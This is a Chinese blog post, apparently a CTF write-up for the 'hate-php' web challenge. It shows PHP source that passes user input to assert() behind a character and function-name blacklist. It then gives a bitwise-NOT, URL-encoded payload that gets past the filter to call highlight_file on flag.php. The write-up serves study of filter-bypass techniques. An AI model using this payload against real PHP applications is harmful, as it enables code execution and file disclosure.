【第五空间智能安全大赛】web hate-php

最新推荐文章于 2024-06-29 20:11:23 发布

Kal1

最新推荐文章于 2024-06-29 20:11:23 发布

阅读量724

点赞数

分类专栏： CTF刷题 WEB 文章标签： php 安全

本文链接：https://blog.csdn.net/weixin_45844670/article/details/108568054

版权

CTF刷题 WEB 专栏收录该内容

26 篇文章 7 订阅

订阅专栏

进入题目链接
得到源码

<?php
error_reporting(0);
if(!isset($_GET['code'])){
    highlight_file(__FILE__);
}else{
    $code = $_GET['code'];
    if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { 
        die('You are too good for me'); 
    }
    $blacklist = get_defined_functions()['internal'];
    foreach ($blacklist as $blackitem) { 
        if (preg_match ('/' . $blackitem . '/im', $code)) { 
            die('You deserve better'); 
        } 
    }
    assert($code);
}

方法一

为了绕过正则匹配，可以使用两次取反

将~'highlight_file'和~'flag.php'用url编码后
再次取反，可以直接获得flag.php源码

<?php
echo urlencode(~'highlight_file');  //%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A
echo "\n";
echo urlencode(~'flag.php'); //%99%93%9E%98%D1%8F%97%8F
?>

/?code=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%93%9E%98%D1%8F%97%8F)

在这里插入图片描述

方法二

https://www.cnblogs.com/Wanghaoran-s1mple/p/13194399.html

https://blog.csdn.net/Rashu99/article/details/106970461/

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Kal1

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
【第五空间智能安全大赛】web hate-php

进入题目链接得到源码<?phperror_reporting(0);if(!isset($_GET['code'])){ highlight_file(__FILE__);}else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
复制链接

扫一扫